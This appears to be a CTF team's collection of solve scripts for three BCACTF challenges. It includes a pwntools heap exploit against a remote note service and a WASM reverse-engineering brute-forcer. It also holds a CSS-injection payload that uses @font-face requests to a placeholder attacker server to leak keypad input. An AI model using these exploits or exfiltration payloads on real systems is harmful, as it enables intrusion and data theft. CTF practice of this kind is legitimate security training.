Team ST4RT, 5th
Notetaker WASM
from pwn import *
def run(i):
p = remote("bin.bcactf.com", 49180)
#p = process(["node", "--experimental-wasi-unstable-preview1", "runner.js"])
def note_print(idx):
p.sendlineafter(b"4)\n", b"1")
p.sendlineafter(b"inclusive)\n", str(idx).encode())
def note_delete(idx):
p.sendlineafter(b"4)\n", b"2")
p.sendlineafter(b"inclusive)\n", str(idx).encode())
def note_create(idx):
p.sendlineafter(b"4)\n", b"3")
p.sendlineafter(b"inclusive)\n", str(idx).encode())
def note_write(idx, data):
p.sendlineafter(b"4)\n", b"4")
p.sendlineafter(b"inclusive)\n", str(idx).encode())
p.sendlineafter(b"\n", data)
note_create(1)
note_create(2)
note_create(3)
note_delete(1)
# 0x442: %15d -> %lld
note_write(1, p32(0x443-0xc) + p32(0x646c6c))
note_delete(2)
note_delete(1)
calc = lambda fd, bk: ((fd-0x8) << 32) | bk
note_write(1, str(calc(0xc00 + 0x4*6, 0x400+0xc*i)).encode()) # note[7] -> flag
note_delete(2)
note_delete(1)
note_print(7)
p.recvline()
p.recvline()
return p.recvline().replace(b"\x10\x0c", b"").strip()
ans = b""
for i in range(3):
ans += run(i)
print(ans)
Wasm Prison
const arr = [];
for(let i = 0; i < 256; i++) arr.push(parseInt(tables.$table0.get(i).name));
console.log(JSON.stringify(arr));
func_n = [0] * 257
fp_table = [192,79,107,193,212,21,15,215,205,34,173,202,67,88,66,106,171,197,52,234,76,5,187,138,20,156,81,182,112,14,174,26,111,147,99,22,125,236,89,127,56,104,43,94,207,100,170,190,204,101,245,132,4,142,238,102,196,176,47,133,191,50,136,121,256,243,183,103,38,148,17,28,211,250,158,172,74,246,51,189,119,181,77,16,229,222,209,131,255,124,165,177,145,91,227,114,135,31,108,27,64,1,6,117,185,73,149,63,71,122,23,166,240,120,252,253,95,226,164,249,214,161,208,80,48,239,217,179,97,218,219,72,18,116,61,178,235,200,198,110,195,163,140,62,169,83,216,168,210,54,49,58,75,194,247,85,139,225,9,244,126,46,153,92,115,86,42,175,36,223,68,7,248,30,150,144,69,180,82,230,24,143,10,11,157,33,44,128,35,228,60,254,70,242,65,146,40,206,203,41,39,8,29,221,78,118,224,13,87,199,109,220,162,159,123,141,25,57,151,37,3,19,130,90,232,45,231,152,241,32,113,96,201,129,134,59,233,251,93,105,160,167,184,98,188,154,155,12,53,84,137,55,213,237,186,2]
with open("chall.wasm", "r") as f:
i = 0
lines = f.readlines()
for idx, line in enumerate(lines):
if line.startswith(" (func $func"):
i+=1
func_n[i] = int(lines[idx+15].split()[1])
inp = bytearray(34)
inp[0:7] = b"bcactf{"
inp[-1:] = b"}"
enc_flag = b"bcactf{\xdc1e2\xf5\x8bR\xf8rl\x1d\xe7;\xe5X\x00\x93\xc9xB\xcd\xea)z\xf2\xd1}"
def func(n, i):
return ((1337 * n) + i + 1) & 255
for i in range(0, 34):
if i < 7 or i == 33:
continue
for j in range(0x100):
fp = fp_table[j ^ 137]
if func(func_n[fp], i) == enc_flag[i]:
inp[i] = j
break
print(inp)
Stylish
import requests
url = "http://webp.bcactf.com:49153";
s = requests.Session()
payload = ""
for c in b"0123456789ABCDEFRS": # R: Reset / S: Submit
payload += f"""
@font-face {{
font-family: poc;
src: url("http://[SERVER]/?c={chr(c)}");
unicode-range: U+00{hex(c)[2:]};
}}
"""
payload += f"""
#keypad button:active {{ font-family: poc; }}
"""
print(payload)
r = s.post(f"{url}/api/report", json={
"bodyBG": "white;",
"bodyFG": "white",
"accentBG": "white",
"accentFG": "white; }" + payload + "a {"
})
print(r.text)
passcode = input("Passcode: ")
r = s.post(f"{url}/api/flag", json={
"passcode": passcode
})
print(r.text)